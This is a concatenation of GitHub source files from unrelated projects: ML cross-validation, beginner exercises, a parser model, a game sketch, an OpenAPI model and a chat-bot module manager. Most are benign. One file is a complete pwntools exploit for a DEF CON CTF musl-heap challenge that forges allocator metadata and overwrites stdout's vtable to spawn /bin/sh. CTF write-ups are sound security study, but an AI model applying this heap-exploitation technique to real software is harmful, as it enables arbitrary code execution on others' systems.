= gcv\n\n# clf1 = LogisticRegression(multi_class='multinomial',\n# solver='newton-cg',\n# random_state=1)\n# clf2 = KNeighborsClassifier(algorithm='ball_tree',\n# leaf_size=50)\n# clf3 = DecisionTreeClassifier(random_state=1)\n# clf4 = SVC(random_state=1)\n# clf5 = RandomForestClassifier(random_state=1)\n# clf6 = ExtraTreesClassifier(random_state=1)\n#\n# clf8 = MLPClassifier(max_iter=10000,random_state=1)\n\n# clf9 = GradientBoostingClassifier(random_state=1)\n\nfor pgrid, est, name in zip((grid1, grid2, grid3, grid4, grid5, grid6, grid8, grid9),\n (pipe1, pipe2, pipe3, pipe4, pipe5, pipe6, pipe8, pipe9),\n ('lr', 'knn', 'dectree', 'svm', 'rf', 'extratree', 'mlp', 'gbm')):\n gcv = GridSearchCV(estimator=est,\n param_grid=pgrid,\n scoring='accuracy',\n n_jobs=-1,\n cv=inner_cv,\n verbose=0,\n refit=True)\n gridcvs[name] = gcv\n\n# %%\nouter_cv = StratifiedKFold(n_splits=outer_splits, shuffle=True, random_state=1)\n\n\n\nscoring = {\"accuracy\": \"accuracy\",\n \"balanced_accuracy\": \"balanced_accuracy\",\n \"neg_log_loss\": \"neg_log_loss\",\n \"st_kl_score\": st_kl_scorer,\n \"log_loss\": log_loss_scorer\n }\n\nscore_dicts = []\nfor name, gs_est in sorted(gridcvs.items()):\n scores_dict = cross_validate(gs_est,\n X=X_train,\n y=y_train,\n cv=outer_cv,\n return_estimator=True,\n scoring=scoring,\n n_jobs=6)\n\n print(50 * '-', '\\n')\n print('Algorithm:', name)\n print(' Inner loop:')\n\n score_dicts.append(scores_dict)\n\n for i in range(scores_dict['test_accuracy'].shape[0]):\n print('\\n Best ACC (avg. of inner test folds) %.2f%%' % (scores_dict['estimator'][i].best_score_ * 100))\n print(' Best parameters:', scores_dict['estimator'][i].best_estimator_)\n print(' ACC (on outer test fold) %.2f%%' % (scores_dict['test_accuracy'][i] * 100))\n\n print('\\n%s | outer ACC %.2f%% +/- %.2f' %\n (name, scores_dict['test_accuracy'].mean() * 100,\n scores_dict['test_accuracy'].std() * 100))\n\n print('\\n%s | outer B-ACC %.2f%% +/- %.2f' %\n (name, scores_dict['test_balanced_accuracy'].mean() * 100,\n scores_dict['test_balanced_accuracy'].std() * 100))\n\n print('\\n%s | negative LL %.2f +/- %.2f' %\n (name, scores_dict['test_neg_log_loss'].mean(),\n scores_dict['test_neg_log_loss'].std()))\n\n print('\\n%s | outer KL %.2f +/- %.2f' %\n (name, scores_dict['test_st_kl_score'].mean(),\n scores_dict['test_st_kl_score'].std()))\n\n print('\\n%s | outer log loss %.2f +/- %.2f' %\n (name, scores_dict['test_log_loss'].mean(),\n scores_dict['test_log_loss'].std()))\n\n# %%\npkl_dir = os.path.join(current_dir, '../pkl')\nfile_name = pkl_dir + \"/nest_cv_results.pkl\"\n\nopen_file = open(file_name, \"wb\")\npickle.dump(score_dicts, open_file)\nopen_file.close()\n\nopen_file = open(file_name, \"rb\")\nloaded_list = pickle.load(open_file)\nopen_file.close()\n\nprint(loaded_list)\n# %%\n# gcv_model_select = GridSearchCV(estimator=pipe5,\n# param_grid=param_grid5,\n# scoring='accuracy',\n# n_jobs=8,\n# cv=inner_cv,\n# verbose=1,\n# refit=False)\n#\n# gcv_model_select.fit(X_train, y_train)\n\n# %%\n# best_model = gcv_model_select.best_estimator_\n\n## We can skip the next step because we set refit=True\n## so scikit-learn has already fit the model to the\n## whole training set\n\n# best_model.fit(X_train, y_train)\n\n\n# train_acc = accuracy_score(y_true=y_train, y_pred=best_model.predict(X_train))\n# test_acc = accuracy_score(y_true=y_test, y_pred=best_model.predict(X_test))\n#\n# print('Accuracy %.2f%% (average over k-fold CV test folds)' %\n# (100 * gcv_model_select.best_score_))\n# print('Best Parameters: %s' % gcv_model_select.best_params_)\n#\n# print('Training Accuracy: %.2f%%' % (100 * train_acc))\n# print('Test Accuracy: %.2f%%' % (100 * test_acc))\n","repo_name":"mat-ej/mma","sub_path":"scripts/nested_cv.py","file_name":"nested_cv.py","file_ext":"py","file_size_in_byte":14088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"20104569225","text":"\"\"\"\n9. Write a Python script to print indices of all occurrences of a given element in a given\nlist.\n\"\"\"\n\nList = [1, 2, 2, 3, 2, 45]\nprint(List)\nFre = 0\nNumber = int(input(\"Enter The Number Which Is Vailiable In List: \"))\nfor i in List:\n if (Number== i):\n print(\"Index No: \", Fre)\n Fre += 1\n\nelse:\n print(List)","repo_name":"PushpakKhadke/Python-Assignment","sub_path":"Assignment14/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"30674386224","text":"#!/usr/bin/env python3\nfrom pwn import *\nimport random\nimport string\nimport codecs\n\nif len(sys.argv) == 1:\n s = process('./libc.so ./mooosl', shell=True)\nelse:\n s = remote('mooosl.challenges.ooo', 23333)\n\ndef store(key_content, value_content, key_size=None, value_size=None, wait=True):\n s.sendlineafter('option: ', '1')\n if key_size is None:\n key_size = len(key_content)\n s.sendlineafter('size: ', str(key_size))\n s.sendafter('content: ', key_content)\n if value_size is None:\n value_size = len(value_content)\n s.sendlineafter('size: ', str(value_size))\n if wait:\n s.recvuntil('content: ')\n s.send(value_content)\n\ndef query(key_content, key_size=None, wait=True):\n s.sendlineafter('option: ', '2')\n if key_size is None:\n key_size = len(key_content)\n s.sendlineafter('size: ', str(key_size))\n if wait:\n s.recvuntil('content: ')\n s.send(key_content)\n\ndef delete(key_content, key_size=None):\n s.sendlineafter('option: ', '3')\n if key_size is None:\n key_size = len(key_content)\n s.sendlineafter('size: ', str(key_size))\n s.sendafter('content: ', key_content)\n\ndef get_hash(content):\n x = 0x7e5\n for c in content:\n x = ord(c) + x * 0x13377331\n return x & 0xfff\n\ndef find_key(length=0x10, h=0x7e5):\n while True:\n x = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))\n if get_hash(x) == h:\n return x\n\nlibc = ELF('./libc.so')\n\nstore('A', 'A')\nfor _ in range(5):\n query('A' * 0x30)\nstore('\\n', 'A' * 0x30)\nstore(find_key(), 'A')\ndelete('\\n')\nfor _ in range(3):\n query('A' * 0x30)\nstore('A\\n', 'A', 0x1200)\nquery('\\n')\nres = codecs.decode(s.recvline(False).split(b':')[1], 'hex')\nmmap_base = u64(res[:8]) - 0x20\nlog.info('mmap base: %#x' % mmap_base)\nchunk_addr = u64(res[8:0x10])\nlog.info('chunk address: %#x' % chunk_addr)\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(chunk_addr - 0x60) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\nquery('\\n')\nheap_base = u64(codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8]) - 0x1d0\nlog.info('heap base: %#x' % heap_base)\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(heap_base + 0xf0) + p64(0) + p64(0x200) + p64(0x7e5) + p64(0))\nquery('\\n')\nlibc.address = u64(codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8]) - 0xb7040\nlog.info('libc base: %#x' % libc.address)\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(next(libc.search(b'/bin/sh\\0'))) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\nquery('\\n')\nassert codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8] == b'/bin/sh\\0'\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(heap_base) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\nquery('\\n')\nsecret = u64(codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8])\nlog.info('secret: %#x' % secret)\n\nfake_meta_addr = mmap_base + 0x2010\nfake_mem_addr = mmap_base + 0x2040\nstdout = libc.address + 0xb4280\n\n# Overwrite stdout-0x10 to fake_meta_addr using dequeue during free\nsc = 8 # 0x90\nfreeable = 1\nlast_idx = 0\nmaplen = 1\nfake_meta = b''\nfake_meta += p64(stdout - 0x18) # prev\nfake_meta += p64(fake_meta_addr + 0x30) # next\nfake_meta += p64(fake_mem_addr) # mem\nfake_meta += p32(0) + p32(0) # avail_mask, freed_mask\nfake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)\nfake_meta += p64(0)\n\nfake_mem = b''\nfake_mem += p64(fake_meta_addr) # meta\nfake_mem += p32(1) # active_idx\nfake_mem += p32(0)\n\npayload = b''\npayload += b'A' * 0xaa0\npayload += p64(secret) + p64(0)\npayload += fake_meta\npayload += fake_mem\npayload += b'\\n'\n\nfor _ in range(2):\n query('A' * 0x30)\nquery(payload, 0x1200)\nstore('A', p64(0) + p64(fake_mem_addr + 0x10) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\ndelete('\\n')\n\n# Create a fake bin using enqueue during free\nsc = 8 # 0x90\nlast_idx = 1\nfake_meta = b''\nfake_meta += p64(0) # prev\nfake_meta += p64(0) # next\nfake_meta += p64(fake_mem_addr) # mem\nfake_meta += p32(0) + p32(0) # avail_mask, freed_mask\nfake_meta += p64((sc << 6) | last_idx)\nfake_meta += p64(0)\n\nfake_mem = b''\nfake_mem += p64(fake_meta_addr) # meta\nfake_mem += p32(1) # active_idx\nfake_mem += p32(0)\n\npayload = b''\npayload += b'A' * 0xa90\npayload += p64(secret) + p64(0)\npayload += fake_meta\npayload += fake_mem\npayload += b'\\n'\n\nquery('A' * 0x30)\nquery(payload, 0x1200)\nstore('A', p64(0) + p64(fake_mem_addr + 0x10) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\ndelete('\\n')\n\n# Overwrite the fake bin so that it points to stdout\nfake_meta = b''\nfake_meta += p64(fake_meta_addr) # prev\nfake_meta += p64(fake_meta_addr) # next\nfake_meta += p64(stdout - 0x10) # mem\nfake_meta += p32(1) + p32(0) # avail_mask, freed_mask\nfake_meta += p64((sc << 6) | last_idx)\nfake_meta += b'A' * 0x18\nfake_meta += p64(stdout - 0x10)\n\npayload = b''\npayload += b'A' * 0xa80\npayload += p64(secret) + p64(0)\npayload += fake_meta\npayload += b'\\n'\nquery(payload, 0x1200)\n\n# Call calloc(0x80) which returns stdout and call system(\"/bin/sh\") by overwriting vtable\npayload = b''\npayload += b'/bin/sh\\0'\npayload += b'A' * 0x20\npayload += p64(heap_base + 1)\npayload += b'A' * 8\npayload += p64(heap_base)\npayload += b'A' * 8\npayload += p64(libc.symbols['system'])\npayload += b'A' * 0x3c\npayload += p32((1<<32)-1)\npayload += b'\\n'\nstore('A', payload, value_size=0x80, wait=False)\n\ns.interactive()\n","repo_name":"hnoson/writeups","sub_path":"defconctf/2021/mooosl/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"878646816","text":"import collections\n\n\ndef parse_cards(inputfile):\n with open(inputfile) as f:\n data = f.read()\n player1, player2 = data.split(\"\\n\\n\")\n player1_deck = collections.deque()\n for line in player1.splitlines():\n try:\n v = int(line.strip())\n except Exception:\n v = None\n if v:\n player1_deck.appendleft(v)\n player2_deck = collections.deque()\n for line in player2.splitlines():\n try:\n v = int(line.strip())\n except Exception:\n v = None\n if v:\n player2_deck.appendleft(v)\n return player1_deck, player2_deck\n\n\ndef main():\n player1_deck, player2_deck = parse_cards(\"input\")\n while player1_deck and player2_deck:\n card1 = player1_deck.pop()\n card2 = player2_deck.pop()\n if card1 > card2:\n player1_deck.extendleft([card1, card2])\n elif card2 > card1:\n player2_deck.extendleft([card2, card1])\n else:\n raise Exception(\"equal values\")\n winner = player1_deck or player2_deck\n score = sum((i + 1) * card for i, card in enumerate(winner))\n print(score)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"elemoine/adventofcode","sub_path":"2020/day22/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"26960711965","text":"import torch\nimport torch.nn as nn\nfrom supar.model import Model\nfrom supar.modules import MLP, DecoderLSTM\nfrom supar.utils import Config\nfrom typing import Tuple, List\n\nclass ArcEagerDependencyModel(Model):\n\n def __init__(self,\n n_words,\n n_transitions,\n n_trels,\n n_tags=None,\n n_chars=None,\n encoder='lstm',\n feat=['char'],\n n_embed=100,\n n_pretrained=100,\n n_feat_embed=100,\n n_char_embed=50,\n n_char_hidden=100,\n char_pad_index=0,\n elmo='original_5b',\n elmo_bos_eos=(True, False),\n bert=None,\n n_bert_layers=4,\n mix_dropout=.0,\n bert_pooling='mean',\n bert_pad_index=0,\n finetune=False,\n n_plm_embed=0,\n embed_dropout=.33,\n n_encoder_hidden=800,\n n_encoder_layers=3,\n encoder_dropout=.33,\n n_arc_mlp=500,\n n_rel_mlp=100,\n mlp_dropout=.33,\n scale=0,\n pad_index=0,\n unk_index=1,\n n_decoder_layers=4,\n **kwargs):\n super().__init__(**Config().update(locals()))\n\n # create decoder for buffer front, stack top and rels\n self.transition_decoder = self.rel_decoder = None, None\n\n stack_size, buffer_size = [self.args.n_encoder_hidden//2] * 2 if (self.args.n_encoder_hidden % 2) == 0 \\\n else [self.args.n_encoder_hidden//2, self.args.n_encoder_hidden//2+1]\n\n # create projection to reduce dimensionality of the encoder\n self.stack_proj = MLP(\n n_in=self.args.n_encoder_hidden, n_out=stack_size,\n dropout=mlp_dropout)\n self.buffer_proj = MLP(\n n_in=self.args.n_encoder_hidden, n_out=buffer_size,\n dropout=mlp_dropout\n )\n\n if self.args.decoder == 'lstm':\n decoder = lambda out_dim: DecoderLSTM(\n input_size=self.args.n_encoder_hidden, hidden_size=self.args.n_encoder_hidden,\n num_layers=self.args.n_decoder_layers, dropout=mlp_dropout,\n output_size=out_dim\n )\n else:\n decoder = lambda out_dim: MLP(\n n_in=self.args.n_encoder_hidden, n_out=out_dim, dropout=mlp_dropout\n )\n\n self.transition_decoder = decoder(n_transitions)\n self.trel_decoder = decoder(n_trels)\n\n # create delay projection\n if self.args.delay != 0:\n self.delay_proj = MLP(n_in=self.args.n_encoder_hidden * (self.args.delay + 1),\n n_out=self.args.n_encoder_hidden, dropout=mlp_dropout)\n\n # create PoS tagger\n if self.args.encoder == 'lstm':\n self.pos_tagger = DecoderLSTM(\n input_size=self.args.n_encoder_hidden, hidden_size=self.args.n_encoder_hidden, output_size=self.args.n_tags, num_layers=1, dropout=mlp_dropout\n )\n else:\n self.pos_tagger = nn.Identity()\n\n self.criterion = nn.CrossEntropyLoss()\n\n def encoder_forward(self, words: torch.Tensor, feats: List[torch.Tensor]) -> Tuple[torch.Tensor]:\n \"\"\"\n Applies encoding forward pass. Maps a tensor of word indices (`words`) to their corresponding neural\n representation.\n Args:\n words: torch.IntTensor ~ [batch_size, bos + pad(seq_len) + eos + delay]\n feats: List[torch.Tensor]\n lens: List[int]\n\n Returns: x, qloss\n x: torch.FloatTensor ~ [batch_size, bos + pad(seq_len) + eos, embed_dim]\n qloss: torch.FloatTensor ~ 1\n\n \"\"\"\n x = super().encode(words, feats)\n s_tag = self.pos_tagger(x[:, 1:-(1+self.args.delay), :])\n\n # adjust lengths to allow delay predictions\n # x ~ [batch_size, bos + pad(seq_len) + eos, embed_dim]\n if self.args.delay != 0:\n x = torch.cat([x[:, i:(x.shape[1] - self.args.delay + i), :] for i in range(self.args.delay + 1)], dim=2)\n x = self.delay_proj(x)\n\n # pass through vector quantization\n x, qloss = self.vq_forward(x)\n return x, s_tag, qloss\n\n def decoder_forward(self, x: torch.Tensor, stack_top: torch.Tensor, buffer_front: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Args:\n x: torch.FloatTensor ~ [batch_size, bos + pad(seq_len) + eos, embed_dim]\n stack_top: torch.IntTensor ~ [batch_size, pad(tr_len)]\n buffer_front: torch.IntTensor ~ [batch_size, pad(tr_len)]\n\n Returns: s_transition, s_trel\n s_transition: torch.FloatTensor ~ [batch_size, pad(tr_len), n_transitions]\n s_trel: torch.FloatTensor ~ [batch_size, pad(tr_len), n_trels]\n \"\"\"\n batch_size = x.shape[0]\n\n # obtain encoded embeddings for stack_top and buffer_front\n stack_top = torch.stack([x[i, stack_top[i], :] for i in range(batch_size)])\n buffer_front = torch.stack([x[i, buffer_front[i], :] for i in range(batch_size)])\n\n # pass through projections\n stack_top = self.stack_proj(stack_top)\n buffer_front = self.buffer_proj(buffer_front)\n\n # stack_top ~ [batch_size, pad(tr_len), embed_dim//2]\n # buffer_front ~ [batch_size, pad(tr_len), embed_dim//2]\n # x ~ [batch_size, pad(tr_len), embed_dim]\n x = torch.concat([stack_top, buffer_front], dim=-1)\n\n # s_transition ~ [batch_size, pad(tr_len), n_transitions]\n # s_trel = [batch_size, pad(tr_len), n_trels]\n s_transition = self.transition_decoder(x)\n s_trel = self.trel_decoder(x)\n\n return s_transition, s_trel\n\n def forward(self, words: torch.Tensor, stack_top: torch.Tensor, buffer_front: torch.Tensor, feats: List[torch.Tensor]) -> Tuple[torch.Tensor]:\n \"\"\"\n Args:\n words: torch.IntTensor ~ [batch_size, bos + pad(seq_len) + eos + delay].\n stack_top: torch.IntTensor ~ [batch_size, pad(tr_len)]\n buffer_front: torch.IntTensor ~ [batch_size, pad(tr_len)]\n feats: List[torch.Tensor]\n\n Returns: s_transition, s_trel, qloss\n s_transition: torch.FloatTensor ~ [batch_size, pad(tr_len), n_transitions]\n s_trel: torch.FloatTensor ~ [batch_size, pad(tr_len), n_trels]\n qloss: torch.FloatTensor ~ 1\n \"\"\"\n x, s_tag, qloss = self.encoder_forward(words, feats)\n s_transition, s_trel = self.decoder_forward(x, stack_top, buffer_front)\n return s_transition, s_trel, s_tag, qloss\n\n def decode(self, s_transition: torch.Tensor, s_trel: torch.Tensor, exclude: list = None):\n transition_preds = s_transition.argsort(-1, descending=True)\n if exclude:\n s_trel[:, :, exclude] = -1\n trel_preds = s_trel.argmax(-1)\n return transition_preds, trel_preds\n\n def loss(self, s_transition: torch.Tensor, s_trel: torch.Tensor, s_tag,\n transitions: torch.Tensor, trels: torch.Tensor, tags,\n smask: torch.Tensor, trmask: torch.Tensor, TRANSITION):\n s_transition, transitions = s_transition[trmask], transitions[trmask]\n s_trel, trels = s_trel[trmask], trels[trmask]\n\n # remove those values in trels that correspond to shift and reduce actions\n transition_pred = TRANSITION.vocab[s_transition.argmax(-1).flatten().tolist()]\n trel_mask = torch.tensor(list(map(lambda x: x not in ['reduce', 'shift'], transition_pred)))\n s_trel, trels = s_trel[trel_mask], trels[trel_mask]\n\n tag_loss = self.criterion(s_tag[smask], tags[smask]) if self.args.encoder == 'lstm' else torch.tensor(0).cuda()\n transition_loss = self.criterion(s_transition, transitions)\n trel_loss = self.criterion(s_trel, trels)\n\n return transition_loss + trel_loss + tag_loss\n","repo_name":"anaezquerro/incpar","sub_path":"supar/models/dep/eager/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"29553059587","text":"size_x = 600\nsize_y = 600\n\n# circle\ncircle_x = 300\ncircle_y = 300\ncircle_rad = 75\n\n# spaceship\nspaceship_x = 300\nspaceship_y = 300\nx_vel = 0\ny_vel = 0\nthrust_factor = 0\nrotation = 0\n\ndef setup():\n size(size_x, size_y)\n strokeWeight(3)\n colorMode(RGB, 1)\n\ndef draw():\n background(0)\n\n # draw blue circle\n global circle_y\n circle_y = circle_y + 1\n if circle_y > size_y + circle_rad:\n circle_y = circle_y - size_y\n elif circle_y > size_y - circle_rad:\n draw_circle_2(circle_y - size_y)\n draw_circle_2(circle_y)\n\n # draw spaceship\n global rotation\n draw_spaceship()\n\n # draw gray circles\n global circle_x\n # resume the space\n translate(-spaceship_x, -spaceship_y)\n circle_x = circle_x + 1\n if circle_x > size_x + circle_rad:\n circle_x = circle_x - size_x\n elif circle_x > size_x - circle_rad:\n draw_circle_1(circle_x - size_x)\n draw_circle_3(circle_x - size_x)\n draw_circle_1(circle_x)\n draw_circle_3(circle_x)\n \ndef draw_circle_1(x):\n fill(0.5, 0.5, 0.5)\n stroke(1.0, 1.0, 1.0)\n ellipse(x, 100, circle_rad*2, circle_rad*2)\n\ndef draw_circle_2(y):\n fill(0.8, 0.9, 1.0)\n stroke(1.0, 1.0, 1.0)\n ellipse(300, y, circle_rad*2, circle_rad*2)\n\ndef draw_circle_3(x):\n fill(0.5, 0.5, 0.5)\n stroke(1.0, 1.0, 1.0)\n ellipse(x, 500, circle_rad*2, circle_rad*2)\n \ndef keyPressed():\n global rotation\n global thrust_factor\n if (key == CODED):\n if keyCode == UP:\n thrust_factor = 0.5\n if keyCode == RIGHT:\n rotation += 3\n if keyCode == LEFT:\n rotation -= 3\n\ndef draw_spaceship():\n global spaceship_x\n global spaceship_y\n global x_vel\n global y_vel\n global thrust_factor\n global rotation\n x_vel = (x_vel + sin(radians(rotation))) * thrust_factor\n y_vel = (y_vel - cos(radians(rotation))) * thrust_factor\n \n spaceship_x = spaceship_x + x_vel\n spaceship_y = spaceship_y + y_vel\n translate(spaceship_x, spaceship_y)\n rotate(radians(rotation))\n fill(0)\n stroke(1)\n strokeWeight(3)\n triangle(-16, 10, 0, -30, 16, 10)\n # resume rotate\n rotate(radians(-rotation))\n","repo_name":"yinxx2019/python","sub_path":"lab10/asteroids/asteroids.pyde","file_name":"asteroids.pyde","file_ext":"pyde","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1278375504","text":"def main():\n T = int(input())\n\n results = {}\n\n for _ in range(T):\n N = int(input())\n\n if N in results:\n print(results[N])\n continue\n\n lowest = N\n highest = N\n\n while True:\n #print(lowest, highest)\n if is_prime(lowest) and is_prime(highest):\n results[N] = str(lowest) + \" \" + str(highest)\n break\n\n lowest -= 1\n highest += 1\n\n print(results[N])\n\n\n# from https://stackoverflow.com/questions/15285534/isprime-function-for-python-language\ndef is_prime(number):\n if number == 2 or number == 3: return True\n if number < 2 or number % 2 == 0: return False\n if number < 9:\n return True\n if number % 3 == 0:\n return False\n r = int(number ** 0.5)\n f = 5\n while f <= r:\n if number % f == 0:\n return False\n if number % (f + 2) == 0:\n return False\n f += 6\n return True\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"staadecker/contest-practice","sub_path":"CCC/2019/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15912083174","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom openapi_server.models.base_model_ import Model\nfrom openapi_server import util\n\n\nclass MnsInfoSingle(Model):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, mns_label=None, mns_type=None, mns_version=None, mns_address=None, mns_scope=None): # noqa: E501\n \"\"\"MnsInfoSingle - a model defined in OpenAPI\n\n :param mns_label: The mns_label of this MnsInfoSingle. # noqa: E501\n :type mns_label: str\n :param mns_type: The mns_type of this MnsInfoSingle. # noqa: E501\n :type mns_type: str\n :param mns_version: The mns_version of this MnsInfoSingle. # noqa: E501\n :type mns_version: str\n :param mns_address: The mns_address of this MnsInfoSingle. # noqa: E501\n :type mns_address: str\n :param mns_scope: The mns_scope of this MnsInfoSingle. # noqa: E501\n :type mns_scope: List[str]\n \"\"\"\n self.openapi_types = {\n 'mns_label': str,\n 'mns_type': str,\n 'mns_version': str,\n 'mns_address': str,\n 'mns_scope': List[str]\n }\n\n self.attribute_map = {\n 'mns_label': 'mnsLabel',\n 'mns_type': 'mnsType',\n 'mns_version': 'mnsVersion',\n 'mns_address': 'mnsAddress',\n 'mns_scope': 'mnsScope'\n }\n\n self._mns_label = mns_label\n self._mns_type = mns_type\n self._mns_version = mns_version\n self._mns_address = mns_address\n self._mns_scope = mns_scope\n\n @classmethod\n def from_dict(cls, dikt) -> 'MnsInfoSingle':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The MnsInfo-Single of this MnsInfoSingle. # noqa: E501\n :rtype: MnsInfoSingle\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def mns_label(self):\n \"\"\"Gets the mns_label of this MnsInfoSingle.\n\n\n :return: The mns_label of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_label\n\n @mns_label.setter\n def mns_label(self, mns_label):\n \"\"\"Sets the mns_label of this MnsInfoSingle.\n\n\n :param mns_label: The mns_label of this MnsInfoSingle.\n :type mns_label: str\n \"\"\"\n\n self._mns_label = mns_label\n\n @property\n def mns_type(self):\n \"\"\"Gets the mns_type of this MnsInfoSingle.\n\n\n :return: The mns_type of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_type\n\n @mns_type.setter\n def mns_type(self, mns_type):\n \"\"\"Sets the mns_type of this MnsInfoSingle.\n\n\n :param mns_type: The mns_type of this MnsInfoSingle.\n :type mns_type: str\n \"\"\"\n allowed_values = [\"ProvMnS\", \"FaultSupervisionMnS\", \"StreamingDataReportingMnS\", \"FileDataReportingMnS\"] # noqa: E501\n if mns_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `mns_type` ({0}), must be one of {1}\"\n .format(mns_type, allowed_values)\n )\n\n self._mns_type = mns_type\n\n @property\n def mns_version(self):\n \"\"\"Gets the mns_version of this MnsInfoSingle.\n\n\n :return: The mns_version of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_version\n\n @mns_version.setter\n def mns_version(self, mns_version):\n \"\"\"Sets the mns_version of this MnsInfoSingle.\n\n\n :param mns_version: The mns_version of this MnsInfoSingle.\n :type mns_version: str\n \"\"\"\n\n self._mns_version = mns_version\n\n @property\n def mns_address(self):\n \"\"\"Gets the mns_address of this MnsInfoSingle.\n\n\n :return: The mns_address of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_address\n\n @mns_address.setter\n def mns_address(self, mns_address):\n \"\"\"Sets the mns_address of this MnsInfoSingle.\n\n\n :param mns_address: The mns_address of this MnsInfoSingle.\n :type mns_address: str\n \"\"\"\n\n self._mns_address = mns_address\n\n @property\n def mns_scope(self):\n \"\"\"Gets the mns_scope of this MnsInfoSingle.\n\n List of the managed object instances that can be accessed using the MnS. If a complete SubNetwork can be accessed using the MnS, this attribute may contain the DN of the SubNetwork instead of the DNs of the individual managed entities within the SubNetwork. # noqa: E501\n\n :return: The mns_scope of this MnsInfoSingle.\n :rtype: List[str]\n \"\"\"\n return self._mns_scope\n\n @mns_scope.setter\n def mns_scope(self, mns_scope):\n \"\"\"Sets the mns_scope of this MnsInfoSingle.\n\n List of the managed object instances that can be accessed using the MnS. If a complete SubNetwork can be accessed using the MnS, this attribute may contain the DN of the SubNetwork instead of the DNs of the individual managed entities within the SubNetwork. # noqa: E501\n\n :param mns_scope: The mns_scope of this MnsInfoSingle.\n :type mns_scope: List[str]\n \"\"\"\n\n self._mns_scope = mns_scope\n","repo_name":"juanmagal/slicenr-server-flask","sub_path":"openapi_server/models/mns_info_single.py","file_name":"mns_info_single.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28599123786","text":"\"\"\"\nModules can be enabled & disabled from the web UI\nModules can be configured from the web UI\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any, Optional\n\nimport json\nimport logging\n\nfrom pajbot.managers.db import Base, DBManager\nfrom pajbot.utils import find\n\nfrom sqlalchemy import Text\nfrom sqlalchemy.orm import Mapped, mapped_column\n\nif TYPE_CHECKING:\n from pajbot.bot import Bot\n from pajbot.models.sock import HandlerParam, SocketManager\n from pajbot.modules.base import BaseModule\n\nlog = logging.getLogger(\"pajbot\")\n\n\nclass Module(Base):\n __tablename__ = \"module\"\n\n id: Mapped[str] = mapped_column(Text, primary_key=True)\n enabled: Mapped[bool]\n settings: Mapped[Optional[str]]\n\n def __init__(self, module_id: str, **options: Any) -> None:\n self.id = module_id\n self.enabled = options.get(\"enabled\", False)\n self.settings = None\n\n\nclass ModuleManager:\n def __init__(self, socket_manager: Optional[SocketManager], bot: Optional[Bot] = None) -> None:\n # List of all enabled modules\n self.modules: list[BaseModule] = []\n\n # List of all available modules, both enabled and disabled\n self.all_modules: list[BaseModule] = []\n\n self.bot = bot\n\n if socket_manager:\n socket_manager.add_handler(\"module.update\", self.on_module_update)\n\n def get_module(self, module_id: str) -> Optional[BaseModule]:\n return find(lambda m: m.ID == module_id, self.all_modules)\n\n def on_module_update(self, data: HandlerParam) -> None:\n new_state = data.get(\"new_state\", None)\n if new_state is True:\n self.enable_module(data[\"id\"])\n elif new_state is False:\n self.disable_module(data[\"id\"])\n else:\n module = self.get_module(data[\"id\"])\n\n if module:\n module.load()\n module.on_loaded()\n\n def enable_module(self, module_id: str) -> bool:\n module = self.get_module(module_id)\n if module is None:\n log.error(f\"No module with the ID {module_id} found.\")\n return False\n\n module.load()\n module.on_loaded()\n\n module.enable(self.bot)\n\n if module in self.modules:\n log.error(\"Module %s is already in the list of enabled modules pajaW\", module_id)\n return False\n\n self.modules.append(module)\n\n return True\n\n def disable_module(self, module_id: str) -> bool:\n module = self.get_module(module_id)\n if not module:\n log.error(f\"No module with the ID {module_id} found.\")\n return False\n\n module.disable(self.bot)\n\n if module not in self.modules:\n 